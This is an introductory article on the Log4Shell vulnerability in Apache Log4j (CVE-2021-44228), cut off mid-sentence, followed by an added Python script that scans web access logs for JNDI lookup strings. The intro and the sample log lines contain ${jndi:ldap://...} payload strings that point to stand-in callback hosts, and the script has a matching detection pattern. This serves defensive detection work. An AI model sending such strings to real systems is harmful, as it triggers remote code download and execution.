Apache Log4j Remote Code Execution (CVE-2021-44228)
Introduction

Log4Shell is a critical vulnerability affecting many versions of the Apache Log4j logging library. The vulnerability allows unauthenticated remote code execution. Attackers can take advantage of it by setting their browser’s user-agent string to the form ${jndi:ldap://[attacker_URL]}. This vulnerability can be found in products of some of the most famous technology vendors such as AWS, IBM, Cloudflare, Cisco, iCloud, Minecraft: Java Edition, Steam, and VMware.

On Dec. 9, 2021, a remote code execution (RCE) vulnerability in Apache Log4j 2 was identified as being exploited in the wild. Public proof of concept (PoC) code was released and subsequent investigation revealed that exploitation was incredibly easy to perform. By submitting a specially crafted request to a vulnerable system, depending on how the system is configured, an attacker is able to instruct that system to download and subsequently execute a malicious payload. Due to the discovery of this ...
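
A log check for the lookup string described above, as an added example that is not part of the original article: it scans web-server access log lines in combined format for ${jndi:...} in the request line, referer and user-agent, and reports the callback host so it can be blocked at egress. The log lines, hosts and function name are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache/nginx "combined" format: ip, timestamp, request line, status, size, referer, user-agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# The lookup string the page describes: ${jndi:ldap://[attacker_URL]}.
# Matched case-insensitively; the scheme and the callback host are captured.
JNDI_RE = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)', re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, .example hosts).
SAMPLE_LOG = """\
198.51.100.23 - - [10/Dec/2021:08:14:02 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [10/Dec/2021:08:14:09 +0000] "GET / HTTP/1.1" 200 5120 "-" "${jndi:ldap://callback.example/a}"
203.0.113.9 - - [10/Dec/2021:08:15:41 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2Fcb2.example%3A1389%2Fx%7D HTTP/1.1" 404 162 "-" "curl/7.79.1"
malformed line that does not parse
"""

def find_jndi_lookups(log_text):
    """Return one finding per request field that carries a JNDI lookup string."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        for field in ("request", "referer", "agent"):
            # Percent-decode so a lookup logged URL-encoded is still recognised.
            hit = JNDI_RE.search(unquote(m.group(field)))
            if hit:
                findings.append({
                    "line": lineno,
                    "source_ip": m.group("ip"),
                    "field": field,
                    "scheme": hit.group("scheme").lower(),
                    "callback_host": hit.group("host").lower(),
                })
    return findings

if __name__ == "__main__":
    for finding in find_jndi_lookups(SAMPLE_LOG):
        print(finding)
```

A hit in the log shows only that the string was received; whether the host was affected depends on the Log4j version and configuration behind it.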